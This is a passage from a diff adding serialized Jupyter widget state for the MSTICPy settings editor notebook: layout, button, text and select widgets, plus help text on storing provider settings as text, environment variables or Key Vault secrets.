+       "value": "\nSelect a provider to edit its settings.<br>\nTo add a new provider, select the name from the \"Add prov\" drop-down and click \"Add\"<br>\n\nThe Storage option tells the settings module to look for the\nvalue in one of three places:\n<ul>\n    <li>Text - this is the usual way to store values that are not sensitive</li>\n    <li>Environment Var - Type the name of variable in the text box</li>\n    <li>Key Vault - use this for sensitive data like passwords and API keys<br>\n    The KeyVault value here can be left empty (the secret name is generated\n    from the settings path), can contain a secret name or can contain a\n    path {vaultname}/{secretname}\n    </li>\n</ul>\n\n<b>Note:</b> Storing values in KeyVault requires some work on your part<br>\nYou must do the following:\n<ol>\n    <li>Create the Key Vault</li>\n    <li>Add the settings for the Vault in the KeyVault section of the configuration</li>\n    <li>Add the values that you want to use to the Vault</li>\n</ol>\nThe Key Vault Configuration link below describes this setup and how you can\nconfigure your Key Vault settings and transfer secrets settings from your\nconfiguration file to a vault.\n<br><a href='https://msticpy.readthedocs.io/en/latest/data_acquisition/GeoIPLookups.html' target='_blank' style='color: blue; text-decoration: underline;'>Online: GeoIP Providers</a><br><a href='https://msticpy.readthedocs.io/en/latest/getting_started/msticpyconfig.html#specifying-secrets-as-key-vault-secrets' target='_blank' style='color: blue; text-decoration: underline;'>Online: Key Vault Configuration</a><br><a href='https://msticpy.readthedocs.io/en/latest/getting_started/msticpyconfig.html' target='_blank' style='color: blue; text-decoration: underline;'>Online: MSTICPy Configuration</a><br><a href='https://msticpy.readthedocs.io/en/latest/getting_started/SettingsEditor.html#adding-geoip-providers' target='_blank' style='color: blue; text-decoration: underline;'>Online: Help on this tab</a>"
+      }
+     },
+     "84c022d2bd1b4722b416cee134d18eb7": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "height": "200px",
+       "width": "45%"
+      }
+     },
+     "84dcbc3651b947dba3d8bc482f45b475": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "854fe1fa9f5e4f09a9cc4b20c7983c99": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "99%"
+      }
+     },
+     "85f0a156af024561a3573720966e9a74": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "130px"
+      }
+     },
+     "8600f46f68874fa7a7364a7f692b8919": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "8662987f97b2430e99ca8b961f5088ca": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "100px"
+      }
+     },
+     "8724671b470d476d8133153f2a67dc38": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_57fba514a278440cbe2cd8df35c9c738",
+        "IPY_MODEL_376254cbac7a4c4ab86f4c804e557e3f"
+       ],
+       "layout": "IPY_MODEL_aec0752390d24288a850f376c77e904f"
+      }
+     },
+     "878f8b44db2149f4967ea48fb21cca5d": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_b63b9e5c01b345fcb356ca9e1476a7b6",
+        "IPY_MODEL_d81922d5908c4159968d962d89a2ce38",
+        "IPY_MODEL_106cc280eff14bd1bd4350b249678007",
+        "IPY_MODEL_75f713decd474fbfad61635108533541"
+       ],
+       "layout": "IPY_MODEL_bdc5fe7e1d234a5a8c5fa2c1a7f232e3"
+      }
+     },
+     "88889c6eb0754590b5b99e686bd165ba": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Load default",
+       "layout": "IPY_MODEL_fe7906d23c6047e8bad2542ae8dbe0f0",
+       "style": "IPY_MODEL_ef4db94a68634fd3a9c541ec49a392b9"
+      }
+     },
+     "88e7532e8ee64e63b0618bb90ce8d8b8": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_56cafbb94d3a463293bebc18cc1414c7"
+       ],
+       "layout": "IPY_MODEL_0b827a2572964dc7a7584636b2e4cb32"
+      }
+     },
+     "898695a165454c11902e042e67a592cf": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "CheckboxModel",
+      "state": {
+       "description": "Def KV Path",
+       "disabled": false,
+       "layout": "IPY_MODEL_5589d6685a434327a25e1420cd29928c",
+       "style": "IPY_MODEL_14d6dd46a9ee49a6871b43708ed9e33f",
+       "value": true
+      }
+     },
+     "8a050e2aa89f453e8e7567c1304ea8d2": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "height": "200px",
+       "width": "99%"
+      }
+     },
+     "8aa14326a0884fa38590629c3da4bd38": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "8c249f45fd4148a1b3d4309e3f649465": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "99%"
+      }
+     },
+     "8c6a1c6bb9124cd6bb7abe62945461f7": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "border": "solid gray 1px",
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "60%"
+      }
+     },
+     "8d526a42cbec42a298da8b542da66063": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "height": "200px",
+       "width": "99%"
+      }
+     },
+     "8d923e51ed1c410a9ce7039694d1aa85": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Reload settings",
+       "layout": "IPY_MODEL_fe7906d23c6047e8bad2542ae8dbe0f0",
+       "style": "IPY_MODEL_ce12e11dc6164f5cae7fd85c504de8c3"
+      }
+     },
+     "8eedb2d9012f4e9caf9d389afc3d8bc1": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "100px"
+      }
+     },
+     "8f310b0c11464a3eb751e627d5ad475c": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_9b587927e2a74269bd1b321b920a0132",
+        "IPY_MODEL_f6cb8833183b4b97addd91721106fc59",
+        "IPY_MODEL_75f713decd474fbfad61635108533541"
+       ],
+       "layout": "IPY_MODEL_232407438b8f47b78979fdfa607b7225"
+      }
+     },
+     "8f3d40a2925744548e21a78108c649b1": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Upload to KV",
+       "layout": "IPY_MODEL_75a190bb22064f0ead73801fafa25e11",
+       "style": "IPY_MODEL_ae24925fcba640a8999fe91276eb0065"
+      }
+     },
+     "8f6f4cb1b0f54eb2a12876a35112148d": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "SelectModel",
+      "state": {
+       "_options_labels": [
+        "ASIHuntOMSWorkspaceV4",
+        "CCIS",
+        "Centrica",
+        "CyberSecuritySoc",
+        "Default",
+        "RedmondSentinelDemoEnvironment"
+       ],
+       "description": "Workspaces",
+       "index": 0,
+       "layout": "IPY_MODEL_535aa7be330448fca1e52a4a09538928",
+       "style": "IPY_MODEL_484dc9e72b434aab9decc0eb6ccc99ec"
+      }
+     },
+     "8fe8964dd213404791163a6a85c90dd6": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "9000ccd4b8c543b19e650cae0e47f78c": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_bd31f21d00d24f0792fdc92f6006cb97",
+        "IPY_MODEL_38e46ce27b2145a6bf0fc2f37e0b244f"
+       ],
+       "layout": "IPY_MODEL_5ef7ccdf266641fe85417f2df660d732"
+      }
+     },
+     "910364bd0dcc46968c41d243711a58a1": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "9153e27fed954b18acb8da1c426f0540": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "LabelModel",
+      "state": {
+       "layout": "IPY_MODEL_2d3b09491cdf4bc09a3e6846b26a8f9b",
+       "style": "IPY_MODEL_ab5ce276e4b643de8ec123b490b376a6",
+       "value": "Settings for Other (GeoIP) Providers"
+      }
+     },
+     "9177c363a20a4afd8089ba24b187dccc": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextModel",
+      "state": {
+       "description": "KeyVault",
+       "layout": "IPY_MODEL_b4f9994e17864f7995bdc8df7adf03ba",
+       "style": "IPY_MODEL_42cdaf287d4f49babd978cd3293a0689"
+      }
+     },
+     "920a78a50b95471db6c7a831cb064cc7": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "92f892b71765482d965296d710228805": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_2f109b2ef4fa459686b858b23a0d6963",
+        "IPY_MODEL_fdb61005274e437bbaf576fe93654f00",
+        "IPY_MODEL_2c053ef2d7a64211a81e4d7f4963e125"
+       ],
+       "layout": "IPY_MODEL_f5b1f696cb794fb1afd1ea2a87283524"
+      }
+     },
+     "9384300713db413f99270bd0a5acd94c": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "100px"
+      }
+     },
+     "944fdca6b0044cbf9378790b606e67d4": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "950b913e838f4f89b19011c6d03a2c6c": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_9177c363a20a4afd8089ba24b187dccc",
+        "IPY_MODEL_898695a165454c11902e042e67a592cf",
+        "IPY_MODEL_b42f7980215a4d66a1f1e5dac33bdf63"
+       ],
+       "layout": "IPY_MODEL_12325177d828476a926c844bdd6a852d"
+      }
+     },
+     "9561bffca6b64899adae5acb9b1ee753": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HTMLModel",
+      "state": {
+       "layout": "IPY_MODEL_ed45994cd94d48668c8ef7702edfacc9",
+       "style": "IPY_MODEL_d808ee0e32bc4fcc9d7c0a7608bd5a63",
+       "value": "\n    <p><b>LocalData provider <i>data_paths</i></b>\n    Enter one or more data paths, separated by new lines\n    </p>\n    <br><a href='https://msticpy.readthedocs.io/en/latest/DataAcquisition.html' target='_blank' style='color: blue; text-decoration: underline;'>Online: Data Providers</a><br><a href='https://msticpy.readthedocs.io/en/latest/getting_started/msticpyconfig.html#specifying-secrets-as-key-vault-secrets' target='_blank' style='color: blue; text-decoration: underline;'>Online: Key Vault Configuration</a><br><a href='https://msticpy.readthedocs.io/en/latest/getting_started/msticpyconfig.html' target='_blank' style='color: blue; text-decoration: underline;'>Online: MSTICPy Configuration</a><br><a href='https://msticpy.readthedocs.io/en/latest/getting_started/SettingsEditor.html#other-data-providers-splunk-azure-cli-localdata-mordor' target='_blank' style='color: blue; text-decoration: underline;'>Online: Help on this tab</a>"
+      }
+     },
+     "95adc86cdebf4984a7e9c6d1366f4404": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_177da9d6558b4f048e2a071d82d03631",
+        "IPY_MODEL_7d11821ac9cb4a4782c949c85e97816a"
+       ],
+       "layout": "IPY_MODEL_1ab19da8ba0a481e89f8a857171b5ecd"
+      }
+     },
+     "974242b730374bfab9aa4209638b1aa7": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "97c3e2f44f5948728157391d78250b75": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "9836718176cb4d70943012533b63fd3b": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_1f10afb27a14428cbddd6ae9608c2cf1",
+        "IPY_MODEL_0ed76234419048859db9819184c3591c"
+       ],
+       "layout": "IPY_MODEL_47bbe69896e64ab0b8d78548abc32217"
+      }
+     },
+     "987722f786d340979ec0b212a7388b6f": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_751d2a67bca242e28bcf2c5f55dc558c",
+        "IPY_MODEL_5113197caf3742a4afc2777e44424a5f"
+       ],
+       "layout": "IPY_MODEL_6a250732b9bf468dbabed46fd402cee8"
+      }
+     },
+     "989dcbb8eed44bf0894a2cd695936353": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "AccordionModel",
+      "state": {
+       "_titles": {
+        "0": "Help"
+       },
+       "children": [
+        "IPY_MODEL_b59bbbcd14914053b3a025463c2970fc"
+       ],
+       "layout": "IPY_MODEL_dede3f980cc34e47b839e2db8dcd6c3d",
+       "selected_index": null
+      }
+     },
+     "990460299ce340aa9b563ffff5bb4959": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_a4f49fb9f659409fa26a38cc8f485f1a"
+       ],
+       "layout": "IPY_MODEL_5f430ad023bb46cbb1cfd877339ec634"
+      }
+     },
+     "992f4897a52742c2b31144a4025c47ce": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "99da7cc9456543fa91de0017af4ced7f": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "150px"
+      }
+     },
+     "9a0377ea682c4201aaa60ed690b59291": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "9a9c3def930f47ed86ae7a146c604c2d": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Search",
+       "layout": "IPY_MODEL_d13c06b32f144724a1a12a1b493c03ed",
+       "style": "IPY_MODEL_1a97678169c249ed94b2fb9cf3d345f8"
+      }
+     },
+     "9aad2abc218449aebfc7d0920fa4542a": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "9ae51a287b924f3db1c8e846bee3dac5": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "200px"
+      }
+     },
+     "9b1048ade96740f5a40804478612f5b5": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "150px"
+      }
+     },
+     "9b28f089810d4ae788d99b9023888c49": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "layout": "IPY_MODEL_543250bf8399477d87a9d0ede9948da7"
+      }
+     },
+     "9b4ca2e2ddcf4125b0c6aba273edfd01": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextModel",
+      "state": {
+       "description": "AzureRegion",
+       "layout": "IPY_MODEL_307293a98db44c97848b363bc6f39f99",
+       "style": "IPY_MODEL_2a1c811b8bec45bcab1e2e46a9e848ac",
+       "value": "East US"
+      }
+     },
+     "9b587927e2a74269bd1b321b920a0132": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "LabelModel",
+      "state": {
+       "layout": "IPY_MODEL_85f0a156af024561a3573720966e9a74",
+       "style": "IPY_MODEL_420dc74dbcae43908eb5ddcaefb97b17",
+       "value": "AuthKey"
+      }
+     },
+     "9bd6b7f9a1d44127b914a08b4af2ac1f": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "SelectModel",
+      "state": {
+       "_options_labels": [
+        "..",
+        ".ipynb_checkpoints",
+        "Kqlmagic_temp_files",
+        "__pycache__",
+        "data",
+        "kqlmagic"
+       ],
+       "description": "Folders",
+       "index": 0,
+       "layout": "IPY_MODEL_dfc631cf70974714b0f73953836bf895",
+       "style": "IPY_MODEL_11de4ffa64c94c15823fce87d93e18b8"
+      }
+     },
+     "9caa44f895cc47cebeef08172be906b2": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "9d2246271f2c402ababa11ccecf29504": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Convert to MP",
+       "layout": "IPY_MODEL_7b32d76ea7a9413b84f9f8813692cf0e",
+       "style": "IPY_MODEL_b8df26df8fe64a19914d03f7fdda39b9"
+      }
+     },
+     "9e62664d4a334e688515c3d485a373cb": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "9e8907ea8b8d4af58c731d9bd7c675f1": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "35%"
+      }
+     },
+     "9eaba2d1322143f0b1a7ae84bff066d4": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "9fb429d5678545e2b5eaaebe450ace9b": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "70px"
+      }
+     },
+     "a09b45f3b4fc48feaec012d592546497": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "a0bdbce4c3e54a38a831c59be219b753": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextModel",
+      "state": {
+       "continuous_update": false,
+       "description": "Path",
+       "layout": "IPY_MODEL_3601702b16814daeb2a400400dd220f3",
+       "style": "IPY_MODEL_e8ae1454dfa94648a2e63f3d212a9cff",
+       "value": "E:\\src\\microsoft\\msticpy\\docs\\notebooks"
+      }
+     },
+     "a11e6eba4e484ea6b7c910ae17b9e0d8": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Save",
+       "layout": "IPY_MODEL_b0c98cf042ed4835bb99cee762cc090d",
+       "style": "IPY_MODEL_5df29ce3d4bd4e77b45b00236a597fbc"
+      }
+     },
+     "a12277cd4adc4442a3d91cd0426bad4e": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "height": "200px",
+       "width": "99%"
+      }
+     },
+     "a18d67cd1e774e70b27024f8ad7804a5": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextModel",
+      "state": {
+       "description": "KeyVault",
+       "layout": "IPY_MODEL_8c249f45fd4148a1b3d4309e3f649465",
+       "style": "IPY_MODEL_5017666d1e234ea385dd9802033cdeb5"
+      }
+     },
+     "a1a2cebda85c4656a3c6387c9daef09f": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextModel",
+      "state": {
+       "description": "WorkspaceId",
+       "layout": "IPY_MODEL_1f2f704c99c14428a081a7d241746a6f",
+       "style": "IPY_MODEL_5c287061e5ff4e5a87002f137433dbff",
+       "value": "52b1ab41-869e-4138-9e40-2a4457f09bf0"
+      }
+     },
+     "a1d90c130a7b413bbe99fe78e62f1903": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "a1fcd22769e7460cbc8b57ea13f713de": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "99%"
+      }
+     },
+     "a207639dee0a47efa60f644c03319db9": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_44fad815235f47c1bea6542968f88c70",
+        "IPY_MODEL_ba198c331f1f457981d067c106c32026"
+       ],
+       "layout": "IPY_MODEL_a67037cf535f4cff843862f2ca1758c9"
+      }
+     },
+     "a30f910d7a8a4432afc5bc62b6f05d47": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "150px"
+      }
+     },
+     "a31f73b327254b7c813cc86b313c6b3d": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "a401941d9f3d4e2ca6c3460843d09506": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "100px"
+      }
+     },
+     "a4f49fb9f659409fa26a38cc8f485f1a": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "layout": "IPY_MODEL_2fbe103305224ee88fa9a4dc47b22ece"
+      }
+     },
+     "a4f692ed58c046c8b5c095b681430a08": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "a50019f9421343d297c119aec72b6e78": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "a51e4b7e3517423390db2fb28b870078": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_e23ddff0618e466883934e0d510ac18e",
+        "IPY_MODEL_5fa5f80e4a6143a28f09f612f1abee2d"
+       ],
+       "layout": "IPY_MODEL_0764eba5420f4559a30a52af853fd513"
+      }
+     },
+     "a58374e5fff44b88be40b8442a299d39": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_8f310b0c11464a3eb751e627d5ad475c",
+        "IPY_MODEL_5a689944bbbe4208af0b7258199627d7",
+        "IPY_MODEL_b5c946e00c254198bd9941fa3fa975da"
+       ],
+       "layout": "IPY_MODEL_e9fb358d8bec4613b1bab956e016b409"
+      }
+     },
+     "a635cc01eb87438aae9b9dbff43dcae3": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_a0bdbce4c3e54a38a831c59be219b753",
+        "IPY_MODEL_559d8120a8cd4e788165028f03e3f44b",
+        "IPY_MODEL_bd6809ed6e454c89bf358ba29eda9837",
+        "IPY_MODEL_3795ac9f3af34c94a6a68f48cf47076d"
+       ],
+       "layout": "IPY_MODEL_c199966467e64d68845bcd4f6757fa23"
+      }
+     },
+     "a67037cf535f4cff843862f2ca1758c9": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "border": "solid gray 1px",
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "60%"
+      }
+     },
+     "a75442a8dc0447f0b65e8cec07981f61": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "75%"
+      }
+     },
+     "a78dfb49f09f44b6b7ac8a1ad0b5eacf": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "a7ac843d471b402ea9310741bf804c63": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextModel",
+      "state": {
+       "description": "Conf File",
+       "layout": "IPY_MODEL_564557756c2e4f83a404447a72707f6d",
+       "style": "IPY_MODEL_b3c418ad172c458eb801acead118dda5"
+      }
+     },
+     "a826c60a0e7343f5815869d5b4e663d0": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "height": "300px",
+       "width": "99%"
+      }
+     },
+     "a864a1a45e9340c5b4614c18b8f15fa7": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_9153e27fed954b18acb8da1c426f0540",
+        "IPY_MODEL_8724671b470d476d8133153f2a67dc38",
+        "IPY_MODEL_e6f6e85fc1584fd59800a70461304660",
+        "IPY_MODEL_75f713decd474fbfad61635108533541"
+       ],
+       "layout": "IPY_MODEL_d3ce11cbadc7442cae69048f6f5b99eb"
+      }
+     },
+     "a8bc147dae634b679fd9eab8517c0235": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "99%"
+      }
+     },
+     "a8e1a611b41f41ae97ee2d4f01f43715": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "a929c446e1df4a24a83144720bb1bbd7": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "a9661f9b69c44d83a72da7792d7690d6": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Open folder",
+       "layout": "IPY_MODEL_f3365d5763fc41b0915210a50acd9044",
+       "style": "IPY_MODEL_391f5063ce604e8480c34f51bb0ffaa6"
+      }
+     },
+     "a9dc7796a0f540128426e637ffc44957": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Convert to MP",
+       "layout": "IPY_MODEL_9ae51a287b924f3db1c8e846bee3dac5",
+       "style": "IPY_MODEL_3bc91074a5ba4e8eac1f33fb8b5152f9"
+      }
+     },
+     "aa67d309b87f405e8bbebc50bcc295e8": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "border": "solid gray 1px",
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "99%"
+      }
+     },
+     "aa696bfbf48c451d853adc3870a52665": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "ab41b236f208450695ed6cebd9603777": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "150px"
+      }
+     },
+     "ab5ce276e4b643de8ec123b490b376a6": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "abc7cd3abbed417893ef254d169dd750": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_4b51cc653b41414a89fa6c47e9d42cfc",
+        "IPY_MODEL_259408ebc289437f9eaccf6cab42636e"
+       ],
